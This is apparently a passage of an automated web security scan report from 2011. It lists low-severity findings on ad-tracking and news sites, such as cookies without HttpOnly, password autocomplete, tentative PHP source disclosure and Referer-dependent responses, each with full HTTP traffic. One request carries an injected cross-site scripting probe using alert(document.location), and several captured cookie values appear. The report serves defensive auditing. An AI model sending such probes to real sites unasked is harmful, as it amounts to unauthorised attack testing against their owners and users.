Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266432%3D1%266286%3D1; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C56%2C4%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; put_2132=439524AE8C6B634E021F5F7802166020

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:40:56 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1%266286%3D1%266432%3D1; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C86%2C2%2C%2C%267259%3D14658%2C0%2C1%2C%2C%267249%3D14658%2C0%2C1%2C%2C%266432%3D14740%2C120%2C6%2C%2C%265671%3D14742%2C0%2C1%2C%2C%264212%3D14742%2C0%2C1%2C%2C%267935%3D14742%2C0%2C1%2C%2C%266073%3D14742%2C0%2C1%2C%2C%267727%3D14742%2C0%2C1%2C%2C%265852%3D14742%2C0%2C1%2C%2C%266286%3D14843%2C0%2C1%2C%2C; expires=Wed, 12-Oct-2011 12:40:56 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

5.48. http://rs.gwallet.com/r1/pixel/x420r5075003

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rs.gwallet.com
Path:   /r1/pixel/x420r5075003

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r1/pixel/x420r5075003 HTTP/1.1
Host: rs.gwallet.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServer.radiumone.gwallet.com=MTAuMTAxLjIuMTIxIDg4ODg=; ra1_uid=4711648038188259648; ra1_oo=1

Response

HTTP/1.1 200 OK
Content-Length: 134
Server: radiumone/1.2
Cache-control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Content-type: text/html; charset=UTF-8
Expires: Tue, 29 Oct 2002 19:50:44 GMT
Pragma: no-cache
P3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-cookie: ra1_uid=4711648038188259648; Expires=Tue, 11-Sep-2012 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sgm=o5; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_sid=22; Expires=Fri, 01-Jan-2010 00:00:00 GMT; Path=/; Domain=gwallet.com; Version=1
Set-cookie: ra1_oo=1; Expires=Mon, 12-Sep-2016 12:49:30 GMT; Path=/; Domain=gwallet.com; Version=1

<html><body><img src="http://d7.zedo.com/img/bh.gif?n=826&g=20&a=1600&s=1&l=1&t=e&e=1" width="1" height="1" border="0" ></body></html>

5.49. http://usadmm.dotomi.com/dmm/servlet/dmm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usadmm.dotomi.com
Path:   /dmm/servlet/dmm

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dmm/servlet/dmm?rurl=http%3A//ads.dotomi.com/ads.php%3Fpid%3D18300%26mtg%3D0%26ms%3D18%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D728%26rheight%3D90%26pp%3D0%26cg%3D42%26tz%3D300&pid=18300&dres=iframe&mtg=0&ms=18&btg=1&mp=1&rwidth=728&rheight=90&pp=0&cg=42&tz=300&cturl=http://yads.zedo.com/ads2/c%3Fa=669089%3Bn=826%3Bx=3597%3Bc=826000622%2C826000622%3Bg=172%3Bi=0%3B1=8%3B2=1%3Btg=1552553424%3Bs=403%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=k5xiThcyanucBq9IXvhSGSz5~090311%3Bsn=1545%3Bsc=8%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D688047%3Bh%3D484782%3Bo%3D20%3By%3D305%3Bv%3D1%3Bt%3Dr%3Bl%3D1%3Bk=http://www.dotomi.com/ HTTP/1.1
Host: usadmm.dotomi.com
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 302 Moved Temporarily
Date: Mon, 12 Sep 2011 12:48:27 GMT
X-Name: dmm-s02
Set-Cookie: DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; Domain=.dotomi.com; Expires=Wed, 11-Sep-2013 12:48:27 GMT; Path=/
Set-Cookie: DotomiStatus=5; Domain=.dotomi.com; Expires=Sat, 10-Sep-2016 12:48:27 GMT; Path=/
Location: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
Content-Length: 0
Content-Type: text/plain


5.50. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s71862144072074

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s71862144072074

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s71862144072074?AQB=1&ndh=1&t=12%2F8%2F2011%2012%3A49%3A5%201%20300&pageName=%2F&g=http%3A%2F%2Fwww.mtv.co.uk%2F&r=http%3A%2F%2Fdrupal.org%2Fcases&ch=homepage&events=event16&c1=%2F&h1=index&c3=homepage&c4=not%20logged-in&c5=non-member&c16=homepage&c33=Monday&c34=5%3A30PM&c41=New&v45=Monday&v46=5%3A30PM&v49=homepage&s=1920x1200&c=16&j=1.6&v=Y&k=N&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:50:03 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFFD85149B5F-6000018C40017E3C|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 12:50:03 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:50:03 GMT
Last-Modified: Tue, 13 Sep 2011 12:50:03 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFFB-36A5-3043A8C4"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www498
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.51. http://viamtvuk.112.2o7.net/b/ss/viamtvuk/1/H.22.1/s88215071307387

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtvuk.112.2o7.net
Path:   /b/ss/viamtvuk/1/H.22.1/s88215071307387

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtvuk/1/H.22.1/s88215071307387?AQB=1&ndh=1&t=12%2F8%2F2011%2013%3A5%3A19%201%20300&pageName=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&g=http%3A%2F%2Fwww.mtv.co.uk%2Ffiles4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&r=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&ch=generic&events=event16&h1=files4e2a2%2522-alert(document.location)-%25226efac768962%2Ffavicon.ico&c3=generic&c4=not%20logged-in&c5=non-member&c16=generic&c33=Monday&c34=7%3A00PM&c41=New&v45=Monday&v46=7%3A00PM&v49=generic&s=1920x1200&c=16&j=1.7&v=Y&k=N&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava(TM)%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: viamtvuk.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/files4e2a2%22-alert(document.location)-%226efac768962/favicon.ico
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:05:02 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]; Expires=Sat, 10 Sep 2016 13:05:02 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:05:02 GMT
Last-Modified: Tue, 13 Sep 2011 13:05:02 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E037E-2269-131ACF42"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www434
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

6. Password field with autocomplete enabled
There are 5 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


6.1. http://www.digitaldollhouse.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
</div>
<form action="/" accept-charset="UTF-8" method="post" id="newhome-register" onsubmit="pageTracker._trackPageview(&#039;/virtual/register&#039;);">
<div>
...[SNIP]...
</label>
<input type="password" name="pass[pass1]" id="edit-pass-pass1" maxlength="128" size="25" class="form-text required password-field" />
</div>
...[SNIP]...
</label>
<input type="password" name="pass[pass2]" id="edit-pass-pass2" maxlength="128" size="25" class="form-text required password-confirm" />
</div>
...[SNIP]...

6.2. http://www.digitaldollhouse.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<div id="login"><form action="/homeone?destination=homeone" accept-charset="UTF-8" method="post" id="newhome-login">
<div>
...[SNIP]...
<div class="form-item" id="newhome-login-pass-wrapper">
<input type="password" name="pass" id="newhome-login-pass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.3. http://www.fastcompany.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
<div id="left_forms"><form action="/home?destination=home" accept-charset="UTF-8" method="post" id="profilLoginForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-pass-wrapper">
<input type="password" name="pass" id="edit-pass" maxlength="60" size="20" class="form-text required" />
</div>
...[SNIP]...

6.4. http://www.fastcompany.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.fastcompany.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.fastcompany.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:47:50 GMT
Server: VoxCAST
Last-Modified: Mon, 12 Sep 2011 12:47:50 GMT
X-Powered-By: PHP/5.2.14
X-Drupal-Cache: HIT
Cache-Control: max-age=0, s-maxage=1200, store, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 12 Sep 2011 13:08:05 GMT
Etag: "1315831685-1"
Vary: Cookie,Accept-Encoding
X-Served-By: daa-www014
X-Cache: HIT from VoxCAST
Age: 1
Content-Length: 67394
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
...[SNIP]...
</div><form action="/" accept-charset="UTF-8" method="post" id="profileSignUpForm" target="_top">
<div>
...[SNIP]...
<div class="form-item" id="edit-regPass-wrapper">
<input type="password" name="regPass" id="edit-regPass" maxlength="60" size="15" class="form-text required" />
</div>
...[SNIP]...

6.5. http://www.nowpublic.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.nowpublic.com
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: www.nowpublic.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:18 GMT
Server: PWS/1.7.3.3
X-Px: ht lax-agg-n54.panthercdn.com
ETag: "f79c8d21f3918aedd34f5c0ed9e4fcae"
Cache-Control: max-age=360
Expires: Mon, 12 Sep 2011 12:54:12 GMT
Age: 6
Content-Length: 74898
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Last-Modified: Mon, 12 Sep 2011 12:28:25 GMT
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<div class="wrapper-body">
<form method="post" action="http://my.nowpublic.com/user/login">
<div id="login-name-wrapper" class="form-item">
...[SNIP]...
</label>
<input type="password" name="pass" id="login-pass" maxlength="128" size="30" class="form-text" />
</div>
...[SNIP]...

7. Source code disclosure

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.digitaldollhouse.com
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET / HTTP/1.1
Host: www.digitaldollhouse.com
Proxy-Connection: keep-alive
Referer: http://drupal.org/cases
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Sep 2011 12:50:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.5
Last-Modified: Mon, 12 Sep 2011 12:50:05 +0000
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
ETag: "1315831805"
Content-Length: 20260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<link rel="stylesheet" type="text/css" href="<?=$path?>/newhome.css" />
...[SNIP]...

8. Referer-dependent response
There are 2 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.



8.1. http://adserving.cpxinteractive.com/st

Summary

Severity:   Information
Confidence:   Firm
Host:   http://adserving.cpxinteractive.com
Path:   /st

Request 1

GET /st?ad_type=pop&ad_size=0x0&section=1620509&banned_pop_types=29&pop_times=1&pop_frequency=86400 HTTP/1.1
Host: adserving.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.nowpublic.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Tue, 13-Sep-2011 12:48:25 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:25 GMT
Content-Length: 430

